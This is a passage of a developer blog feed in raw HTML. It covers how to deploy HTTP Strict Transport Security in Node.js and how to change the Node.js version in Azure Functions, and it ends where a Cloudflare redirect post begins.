href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitmproxy-credentials-intercepted.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fmitmproxy-credentials-intercepted.webp" alt="mitmproxy credentials intercepted"></a></p> <h2> Solution: HSTS </h2> <p>What can we do in order to keep the traffic between users and servers safe? </p> <p>HTTP Strict Transport Security is a IETF standard approved in 2012 that was designed to help solve the problem of clients making insecure requests to secure-able endpoints.</p> <p>If you take away one thing from this post, remember <code>HSTS = HTTPS only</code>.</p> <p>It lets a webserver inform the browser (and any other complying User Agents) to <strong>communicate with that server's domain only in a secure fashion</strong>. <br> Browser acknowledges the instruction and marks the server's domain as <strong>Known HSTS host</strong>. <br> Next time, when establishing an HTTP connection, the browser will check if target host is:</p> <ul> <li>one of known HSTS hosts</li> <li>a subdomain of one of known HSTS hosts having <code>includeSubdomains</code> If either is true, the browser will treat the host as <strong>HTTPS only</strong>.</li> </ul> <p>What benefits does it bring?</p> <p>1. Browser <strong>transforms all HTTP requests</strong> to a known HSTS host into HTTPS requests automatically.</p> <ul> <li>When user enters <code>example.com</code> or <code>http://example.com</code> in the browser's address bar</li> <li>When user clicks <code>http://...</code> link or a bookmark</li> <li>When the code makes a <code>fetch</code> request</li> <li>When browser is about to follow a <code>http</code> redirect</li> </ul> <p>2. Browser <strong>prevents clicking through</strong> certificate warning messages.</p> <p>When you open a page that has a SSL certificate issue, browser will show a warning page. Normally you can click something like <em>I understand, let me in</em> and continue browsing. When any SSL error/warning occurs on a known HSTS host, browser will <strong>block the user</strong> from using the page completely. The error message will be not dismissable. This is useful to prevent self-signed certificate attack mentioned above.</p> <p>3. As an added bonus, it saves an extra redirect when user enters <code>http://example.com</code>. Because browser already knows it's a HSTS host it will fetch <code>https://example.com</code> right away.</p> <p>How does server declare itself as HTTPS-only? Via a <code>Strict-Transport-Security</code> HTTP header.</p> <h2> Strict-Transport-Security header </h2> <p>The header value can consist of 3 directives. An example with all 3:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Strict-Transport-Security: max-age=63072000; includeSubDomains; preload </code></pre> </div> <h3> max-age </h3> <ul> <li>Required</li> <li>For how long browser should cache and apply given HSTS policy</li> <li>Every time browser receives the header, it will refresh the expire time (rolling)</li> </ul> <p><code>max-age=0</code> has special meaning:</p> <ul> <li>If host that sends it is known, stop treating the host as HSTS and remove the policy</li> <li>If host is unknown, do not add it to the list of known HSTS hosts</li> </ul> <h3> includeSubDomains </h3> <ul> <li>Optional</li> <li>If present, makes browser apply the policy to all subdomains of the host. For example if the directive is issued by <code>foo.example.com</code>, <code>foo.example.com</code> and <code>bar.foo.example.com</code> will be considered as HTTPS-only, but not <code>example.com</code> and <code>baz.example.com</code> </li> <li>Unless you have a good reason not to, you should include all subdomains to be covered by the HSTS policy</li> </ul> <h3> preload </h3> <ul> <li>Optional</li> <li>Not a part of the standard but rather an initiative by browser vendors</li> <li>Indicates the site owner agrees the site to be included in the HSTS Preload list</li> </ul> <p>What's the use for <code>preload</code>?</p> <p><strong>Even if a site added the HSTS header</strong>, there's a small window where a user visiting that site can still be subject to a MITM attack.</p> <p>HSTS policy is activated only if the user <strong>visited the site previously</strong> (and the browser processed the header). If the browser doesn't know anything about the site, whether it's HSTS-enabled or not, it may establish an insecure connection.<br> The browser may know nothing about the HSTS status of the site in case:</p> <ul> <li>It never loaded that site before</li> <li>Browser cache was cleared</li> <li>HSTS policy expired</li> </ul> <p>To solve this problem, browser vendors ship their browsers with a huge list of known HSTS domains baked in. If the domain is in the HSTS preload list, insecure connection to that domain will <strong>never happen</strong>.</p> <p><code>preload</code> directive in the header only communicates site owner's <strong>consent</strong> to be included in the preload list.<br> In order to add a domain to the list, you still need to submit it at <a href="https://hstspreload.org" rel="noopener noreferrer">https://hstspreload.org</a>. The site must meet the requirements to be included.<br> The submission site is maintained by Google and the list is used by <strong>all major browsers</strong> (though each vendor may decide to include extra entries).</p> <p>There are serious implications to the preload list inclusion:</p> <ul> <li>It is a <strong>one way ticket</strong>. After the domain is added browsers will use HTTPS scheme only to load that domain, no matter the header value, expiration date or cache state</li> <li>You can ask to remove the domain from HSTS preload list, but it <strong>can take months</strong> to happen</li> </ul> <p>For some domains you may not need to add them to the preload lists as their TLDs are included by default. That's the case with <code>.dev</code> and <code>.app</code> for example.</p> <h2> Implement in Node.js </h2> <p>Implementing HSTS is as simple as adding the <code>Strict-Transport-Security</code> header in your code.</p> <p>In Express (put it before any other controller):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">secure</span><span class="p">)</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Strict-Transport-Security</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">max-age=63072000; includeSubDomains</span><span class="dl">'</span><span class="p">)</span> <span class="c1">// 2 years</span> <span class="p">}</span> <span class="nf">next</span><span class="p">()</span> <span class="p">})</span> </code></pre> </div> <p>If you try to access the site with the same mitmproxy setup after HSTS was implemented you will see something similar:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fhsts-warning-firefox.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F03%2Fhttp-strict-transport-security%2Fhsts-warning-firefox.webp" alt="hsts warning firefox"></a></p> <p>Implement in Azure Functions:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="k">async</span> <span class="nf">function </span><span class="p">(</span><span class="nx">context</span><span class="p">,</span> <span class="nx">req</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Strict-Transport-Security</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">max-age=63072000; includeSubDomains</span><span class="dl">'</span><span class="p">,</span> <span class="p">}</span> <span class="p">...</span> <span class="nx">context</span><span class="p">.</span><span class="nx">res</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">body</span><span class="p">,</span> <span class="nx">headers</span><span class="p">,</span> <span class="nx">status</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Implement in AWS Lambda (you may want to add it in API Gateway instead):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async </span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="p">...</span> <span class="kd">let</span> <span class="nx">response</span> <span class="o">=</span> <span class="p">{</span> <span class="na">statusCode</span><span class="p">:</span> <span class="nx">responseCode</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Strict-Transport-Security</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">max-age=63072000; includeSubDomains</span><span class="dl">'</span><span class="p">,</span> <span class="p">},</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">responseBody</span><span class="p">),</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">response</span><span class="p">;</span> <span class="p">};</span> </code></pre> </div> <h2> Safe HSTS deployment plan </h2> <p>Inspired by the great HSTS tutorial from <a href="https://scotthelme.co.uk/hsts-cheat-sheet/" rel="noopener noreferrer">Scott Helme</a>.</p> <p>The idea is to start small and gradually increment the expiration time and inclusion criteria.</p> <ol> <li>Find out all subdomains you have (consult DNS CNAME entries). Those may be served by your servers or <strong>3rd party services</strong> </li> <li>Make sure the root domain and all subdomains can serve traffic over SSL/TLS (accessible via HTTPS)</li> <li>Ensure HTTP -&gt; HTTPS redirect is configured</li> <li>Set small expiration time, e.g. <code>max-age=600</code> (10 minutes), make sure all systems operational</li> <li>Add <code>includeSubDomains</code> directive</li> <li>Make incremental changes to <code>max-age</code>. Aim for the value of 2 years</li> <li>Add <code>preload</code> directive and submit the domain to the HSTS preload list</li> </ol> <h2> Implications / considerations </h2> <p>⚡︎ HSTS is <strong>well supported</strong> by all browsers: <a href="https://caniuse.com/stricttransportsecurity" rel="noopener noreferrer">https://caniuse.com/stricttransportsecurity</a></p> <p>⚡︎ Even with HSTS in place, you still need the <strong>HTTP → HTTPS</strong> redirect.</p> <p>⚡︎ It should be clear how websites or webapps that users load can benefit from HSTS. Does it make sense to add the header to <strong>APIs</strong>?</p> <ul> <li> <strong>No</strong>, if the API is consumed only by trusted clients, where the scheme is hardcoded and cannot be changed. Think mobile apps or servers using your API.</li> <li> <strong>Yes</strong>, if the API is used by browsers. If the web app that calls your API is compromised it can be tricked to make insecure calls: <code>http://your-no-longer-safe-api</code>.</li> </ul> <p>⚡︎ HSTS won't help against attacks to the <strong>SSL/TLS protocol</strong> itself, as well as in cases where the server or browser are compromised.</p> <p>⚡︎ HSTS is <strong>not related to the certificates</strong> being used by the server <strong>as long as the certificates are valid</strong>. You can replace/renew certificates at any time.</p> <p>⚡︎ Users can <strong>manually add and remove HSTS hosts</strong> in browser settings (not preloaded lists though).</p> <p>⚡︎ If you <strong>redirect</strong> <code>http://example.com</code> → <code>https://www.example.com</code> and latter sets the HSTS header with subdomains, <code>example.com</code> (root) and <code>sub.example.com</code> won't have HSTS.<br> Solution: include 1px picture from <code>https://example.com</code> (which will set the header on the root domain and all subdomains) on every page. <br> Or better, add the domain to the HSTS preloaded list.</p> <p>⚡︎ HSTS preferences are not shared between normal/<strong>incognito</strong> modes in the browser.</p> <p>⚡︎ HSTS domain may be vulnerable to a <strong>NTP attack</strong>. Victim gets fake response from the NTP server and expires existing HSTS preferences.<br> Not effective if the domain is in browsers' pre-loaded list.</p> <p>⚡︎ Even if domain is added to the preloaded lists, you still need to send the <code>Strict-Transport-Security</code> for clients that <strong>do not use the list</strong>.</p> <p>⚡︎ HSTS headers must not be sent with <strong>insecure HTTP responses</strong> (and if you do, browsers won't process them anyway).</p> <p>⚡︎ Browsers will ignore HSTS headers received over <strong>SSL connection with warnings</strong> (e.g. using self-signed certificate).</p> <p>⚡︎ Browsers will ignore HSTS headers if the hostname is in the form of <strong>IP address</strong>.</p> <p>⚡︎ Funny fact: <code>google.com</code> does not set HSTS policy on the root domain (mail.google.com does have it). It seems that's due to the requirement to <a href="https://security.stackexchange.com/questions/239241/google-com-is-not-hsts-protected" rel="noopener noreferrer">support legacy workflows</a>.</p> <h2> References </h2> <ul> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html" rel="noopener noreferrer">https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html</a></li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security" rel="noopener noreferrer">https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security</a></li> <li><a href="https://tools.ietf.org/html/rfc6797" rel="noopener noreferrer">https://tools.ietf.org/html/rfc6797</a></li> <li><a href="https://scotthelme.co.uk/hsts-cheat-sheet/" rel="noopener noreferrer">https://scotthelme.co.uk/hsts-cheat-sheet/</a></li> <li><a href="https://github.com/maximivanov/vulnerable-by-design/tree/main/hsts" rel="noopener noreferrer">https://github.com/maximivanov/vulnerable-by-design/tree/main/hsts</a></li> </ul> <h2> ... </h2> <p>Stay tuned for the next posts in the Node.js security best practices series!</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i" rel="noopener noreferrer">follow me</a> on Twitter for the latest updates.</em></p> node security http tutorial How to change/upgrade Node.js version in Azure Functions Max Ivanov Thu, 25 Feb 2021 19:33:49 +0000 https://forem.com/maxivanov/how-to-change-upgrade-node-js-version-in-azure-functions-14i0 https://forem.com/maxivanov/how-to-change-upgrade-node-js-version-in-azure-functions-14i0 <p>If you haven't touched your function app for a while there's a chance it's running an older version of Node.js. You may consider upgrading to benefit from new features, performance improvements and security fixes.<br> As we're approaching March 2021, Node.js 12 is the recommended version in Azure Functions and version 14 is in preview. You may want to upgrade when it reaches the GA status.</p> <ul> <li>How do you know which Node.js version is currently used?</li> <li>How to change/upgrade Node.js version for Linux and Windows function apps?</li> <li>Is there any difference when running in Consumption and Premium hosting plans?</li> <li>How to make the change with Azure Portal, CLI, ARM, Terraform?</li> </ul> <p>I've tested all combinations of Linux/Windows, Consumption/Premium to verify the process of changing Node.js versions. Answers below.</p> <h2> Azure Functions Runtime version </h2> <p>Before we get to Node.js versions, there's an important concept of <strong>Azure Functions Runtime version</strong>.</p> <p>Node.js versions that are available to you depend on the OS and the Functions Runtime version used.<br> You can see runtime versions and their supported Node.js versions <a href="https://docs.microsoft.com/en-us/azure/azure-functions/functions-reference-node?tabs=v2#node-version" rel="noopener noreferrer">here</a>.</p> <p>How to find out Azure Functions runtime version you use?</p> <p><a href="https://github.com/Azure/azure-functions-host/wiki/How-do-I-check-the-functions-runtime-version%3F" rel="noopener noreferrer">Here</a> is the most reliable way to check the runtime version that I found. </p> <p>Get your function app's master key and make a request:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl https://&lt;functionappname&gt;.azurewebsites.net/admin/host/status?code<span class="o">=</span>&lt;masterkey&gt; </code></pre> </div> <p>In the returned JSON, you will find the <code>"version"</code> property.</p> <p>Note <code>FUNCTIONS_EXTENSION_VERSION</code> application setting (e.g. <code>~3</code>) is not a reliable indicator. <br> There was a <a href="https://github.com/Azure/app-service-announcements-discussions/issues/175" rel="noopener noreferrer">platform upgrade for Azure Functions v2</a>, where this app setting could remain at <code>~2</code> while in reality the runtime became <code>3.x</code>. Confusing, I know.</p> <p>If you find out the Node.js version you're aiming for is not supported, you will need to <a href="https://docs.microsoft.com/en-us/azure/azure-functions/set-runtime-version?tabs=portal%2Cazurecli-linux" rel="noopener noreferrer">upgrade the Functions runtime</a>.<br> If you develop and test functions locally, make sure to update Azure Functions Core Tools to the <a href="https://docs.microsoft.com/en-us/azure/azure-functions/functions-run-local?tabs=macos%2Ccsharp%2Cbash#core-tools-versions" rel="noopener noreferrer">latest version</a> as well.</p> <h2> Find out what Node.js version is currently used </h2> <p>The process is a bit different on Windows and on Linux.</p> <p>On Windows, Node.js version is dictated by the <code>WEBSITE_NODE_DEFAULT_VERSION</code> application setting of the function app. </p> <p>On Linux, <code>WEBSITE_NODE_DEFAULT_VERSION</code> has no effect. It is the <code>linuxFxVersion</code> config option on the function app resource that defines the Node.js version. <br> Note there's a <a href="https://github.com/Azure/azure-cli/issues/15171" rel="noopener noreferrer">bug</a> where <code>linuxFxVersion</code> may be reported as empty in Azure CLI.</p> <p>The most reliable way to see the Node.js version you're running is to print or log it from a function.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="k">async</span> <span class="nf">function </span><span class="p">(</span><span class="nx">context</span><span class="p">,</span> <span class="nx">req</span><span class="p">)</span> <span class="p">{</span> <span class="nx">context</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">JavaScript HTTP trigger function processed a request.</span><span class="dl">'</span><span class="p">)</span> <span class="nx">context</span><span class="p">.</span><span class="nx">res</span> <span class="o">=</span> <span class="p">{</span> <span class="na">body</span><span class="p">:</span> <span class="s2">`Node version: </span><span class="p">${</span><span class="nx">process</span><span class="p">.</span><span class="nx">version</span><span class="p">}</span><span class="s2">`</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Alternatively, you can see it in a shell session which you can open from your function app page in the the Azure Portal.</p> <p>On Linux (Premium only, there's no such option in Consumption plan), launch <em>Development Tools</em> / <em>SSH</em>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@9eaec89e01d4:~# node <span class="nt">--version</span> v10.23.1 </code></pre> </div> <p>On Windows (Premium &amp; Consumption plans), go to <em>Development Tools</em> / <em>Console</em>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>C:<span class="se">\h</span>ome<span class="se">\s</span>ite<span class="se">\w</span>wwroot&gt; node <span class="nt">--version</span> v12.18.0 </code></pre> </div> <p>One observation I made while doing tests: Windows function app without <code>WEBSITE_NODE_DEFAULT_VERSION</code> won't start at all. When triggered, the function will fail with the error: <code>502 - Web server received an invalid response while acting as a gateway or proxy server.</code>.</p> <h2> Change Node.js version in Linux Function Apps </h2> <p>As mentioned above, <code>linuxFxVersion</code> config is what dictates the Node.js version. <br> Not related to the version business, but make sure you also have <code>FUNCTIONS_WORKER_RUNTIME=node</code> application setting set.</p> <p><strong>Azure Portal</strong></p> <p>As of February 2021, you cannot change the language version for Linux Consumption through Portal. </p> <p>If you're on Linux Premium plan:<br> From your App Function page, go to the <em>Settings</em> / <em>Configuration</em> → <em>General settings</em>. Use the <em>Node.js Version</em> dropdown to change the version, then <em>Save</em>. </p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F02%2Fchange-nodejs-version-in-azure-functions%2Fazure-functions-change-nodejs-version-linux-portal.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F02%2Fchange-nodejs-version-in-azure-functions%2Fazure-functions-change-nodejs-version-linux-portal.webp" alt="Change Node.js version in Linux Azure Functions in Portal"></a></p> <p><strong>Azure CLI</strong></p> <p>Out of curiosity, you may want to see the current <code>linuxFxVersion</code> value:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>az functionapp config show <span class="nt">--name</span> &lt;func app name&gt; <span class="nt">--resource-group</span> &lt;rg name&gt; | jq <span class="s1">'.linuxFxVersion'</span> </code></pre> </div> <ul> <li>(if you don't have <code>jq</code> installed, just remove <code>| jq ...</code>)</li> <li>(result may be empty due to a bug, see the <a href="https://github.com/Azure/azure-cli/issues/15171" rel="noopener noreferrer">github issue</a>).</li> </ul> <p>Set the Node.js version:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>az functionapp config <span class="nb">set</span> <span class="nt">--name</span> azfuncnodever-function-app-linux-premium <span class="nt">--resource-group</span> azfuncnodever-resource-group-linux-premium <span class="nt">--linux-fx-version</span> <span class="s2">"node|14"</span> </code></pre> </div> <p>No manual function app restart required, give it a couple minutes and Node.js version will be switched.</p> <p>You can provide a full (Microsoft managed) Docker image name if you want to explicitly set the Azure Functions runtime version.<br> Full list of supported Azure functions Docker tags can be found <a href="https://mcr.microsoft.com/v2/azure-functions/node/tags/list" rel="noopener noreferrer">here</a>.<br> But you can also simply use <code>node|&lt;version&gt;</code> as a shorthand. In this case, latest runtime version will be used. More on setting <code>LinuxFxVersion</code> <a href="https://github.com/Azure/azure-functions-host/wiki/Using-LinuxFxVersion-for-Linux-Function-Apps" rel="noopener noreferrer">here</a>.</p> <p>If you provide an invalid value for the LinuxFxVersion argument, the command will fail with <code>Operation returned an invalid status code 'Bad Request'</code> error. (Only if target plan is Consumption though, if Premium, the CLI will eat it silently. Github issue <a href="https://github.com/Azure/azure-cli/issues/17020" rel="noopener noreferrer">created</a>.)</p> <p><strong>ARM template</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"apiVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2016-03-01"</span><span class="p">,</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Microsoft.Web/sites"</span><span class="p">,</span><span class="w"> </span><span class="nl">"kind"</span><span class="p">:</span><span class="w"> </span><span class="s2">"functionapp"</span><span class="p">,</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"properties"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"siteConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"linuxFxVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"node|14"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"azurerm_function_app"</span> <span class="s2">"function_app"</span> <span class="p">{</span> <span class="p">...</span> <span class="nx">site_config</span> <span class="p">{</span> <span class="p">...</span> <span class="nx">linux_fx_version</span> <span class="p">=</span> <span class="s2">"node|14"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Another observation that I made with current Terraform v0.14.6 and <code>azurerm</code> provider v2.48.0. Linux function app without <code>linuxFxVersion</code> set explicitly defaults to Azure Functions runtime <code>~3</code> and Node.js 10. Here's the <a href="https://github.com/Azure/azure-functions-host/issues/7176" rel="noopener noreferrer">discussion</a> around it.</p> <h2> Change Node.js version in Windows Function Apps </h2> <p>In Windows function apps, you can control the Node.js version via the <code>WEBSITE_NODE_DEFAULT_VERSION</code> application setting. The value must be in the <code>~&lt;major version&gt;</code> format, e.g. <code>~14</code>.</p> <p><strong>Azure Portal</strong></p> <p>Unlike on Linux, you can change the version of both Premium and Consumption plans in the Portal.</p> <p>From your App Function page, go to the <em>Settings</em> / <em>Configuration</em> → <em>General settings</em>. Use the <em>Node.js Version</em> dropdown to change the version, then <em>Save</em>.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F02%2Fchange-nodejs-version-in-azure-functions%2Fazure-functions-change-nodejs-version-windows-portal.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F02%2Fchange-nodejs-version-in-azure-functions%2Fazure-functions-change-nodejs-version-windows-portal.webp" alt="Change Node.js version in Windows Azure Functions in Portal"></a></p> <p><strong>Azure CLI</strong></p> <p>Before changing, if you wonder what's the current value of <code>WEBSITE_NODE_DEFAULT_VERSION</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>az functionapp config appsettings list <span class="nt">--name</span> &lt;func app name&gt; <span class="nt">--resource-group</span> &lt;rg name&gt; | jq <span class="s1">'.[] | select(.name == "WEBSITE_NODE_DEFAULT_VERSION")'</span> </code></pre> </div> <p>(if you don't have <code>jq</code> installed, just remove <code>| jq ...</code>)</p> <p>Set the Node.js version:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>az functionapp config appsettings <span class="nb">set</span> <span class="nt">--name</span> &lt;func app name&gt; <span class="nt">--resource-group</span> &lt;rg name&gt; <span class="nt">--settings</span> <span class="s2">"WEBSITE_NODE_DEFAULT_VERSION=~14"</span> </code></pre> </div> <p>No manual function app restart required, give it couple minutes and Node.js version will be switched.</p> <p>You can provide a full (Microsoft managed) Docker image name if you want to explicitly set the Azure Functions runtime version, or you can simply use <code>node|&lt;version&gt;</code> as a shorthand. In the latter case, latest runtime version will be used. More on setting <code>LinuxFxVersion</code> <a href="https://github.com/Azure/azure-functions-host/wiki/Using-LinuxFxVersion-for-Linux-Function-Apps" rel="noopener noreferrer">here</a>.</p> <p><strong>Powershell</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Update-AzFunctionAppSetting</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="s2">"&lt;func app name&gt;"</span><span class="w"> </span><span class="nt">-ResourceGroupName</span><span class="w"> </span><span class="s2">"&lt;rg name&gt;"</span><span class="w"> </span><span class="nt">-AppSetting</span><span class="w"> </span><span class="p">@{</span><span class="s2">"WEBSITE_NODE_DEFAULT_VERSION"</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"~14"</span><span class="p">}</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span></code></pre> </div> <p><strong>ARM template</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"apiVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2016-03-01"</span><span class="p">,</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Microsoft.Web/sites"</span><span class="p">,</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[variables('functionAppName')]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"location"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[resourceGroup().location]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"kind"</span><span class="p">:</span><span class="w"> </span><span class="s2">"functionapp"</span><span class="p">,</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"properties"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"siteConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"appSettings"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"WEBSITE_NODE_DEFAULT_VERSION"</span><span class="p">,</span><span class="w"> </span><span class="nl">"value"</span><span class="p">:</span><span class="w"> </span><span class="s2">"~14"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"azurerm_function_app"</span> <span class="s2">"function_app"</span> <span class="p">{</span> <span class="p">...</span> <span class="nx">app_settings</span> <span class="p">=</span> <span class="p">{</span> <span class="p">...</span> <span class="s2">"WEBSITE_NODE_DEFAULT_VERSION"</span> <span class="p">=</span> <span class="s2">"~14"</span><span class="p">,</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> References </h2> <ul> <li><a href="https://docs.microsoft.com/en-us/azure/azure-functions/functions-reference-node?tabs=v2#node-version" rel="noopener noreferrer">https://docs.microsoft.com/en-us/azure/azure-functions/functions-reference-node?tabs=v2#node-version</a></li> <li><a href="https://docs.microsoft.com/en-us/azure/azure-functions/set-runtime-version?tabs=portal%2Cazurecli-linux" rel="noopener noreferrer">https://docs.microsoft.com/en-us/azure/azure-functions/set-runtime-version?tabs=portal%2Cazurecli-linux</a></li> <li><a href="https://github.com/Azure/azure-functions-nodejs-worker/issues/283" rel="noopener noreferrer">https://github.com/Azure/azure-functions-nodejs-worker/issues/283</a></li> <li><a href="https://docs.microsoft.com/en-us/azure/azure-functions/functions-infrastructure-as-code#create-a-function-app-2" rel="noopener noreferrer">https://docs.microsoft.com/en-us/azure/azure-functions/functions-infrastructure-as-code#create-a-function-app-2</a></li> <li><a href="https://github.com/Azure/azure-functions-host/issues/3406" rel="noopener noreferrer">https://github.com/Azure/azure-functions-host/issues/3406</a></li> <li><a href="https://github.com/Azure/azure-functions-host/wiki/Using-LinuxFxVersion-for-Linux-Function-Apps" rel="noopener noreferrer">https://github.com/Azure/azure-functions-host/wiki/Using-LinuxFxVersion-for-Linux-Function-Apps</a></li> </ul> <h2> ... </h2> <p>I wish working with Linux in Azure was simpler. There are a lot of inconsistencies between Linux and Windows plans and Linux offering often misses features. </p> <p>Yet I think Azure is a great platform with its vision and hopefully those issues will be sorted out soon.</p> <p>You can find sources for my test lab consisting of 4 function apps in the <a href="https://github.com/maximivanov/azure-functions-set-nodejs-version" rel="noopener noreferrer">repo</a>.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i" rel="noopener noreferrer">follow me</a> on Twitter for the latest updates.</em></p> node azure azurefunctions serverless Domain and path redirects with Cloudflare Max Ivanov Sat, 20 Feb 2021 02:24:17 +0000 https://forem.com/maxivanov/domain-and-path-redirects-with-cloudflare-2imi https://forem.com/maxivanov/domain-and-path-redirects-with-cloudflare-2imi <p>Below is a quick overview of common 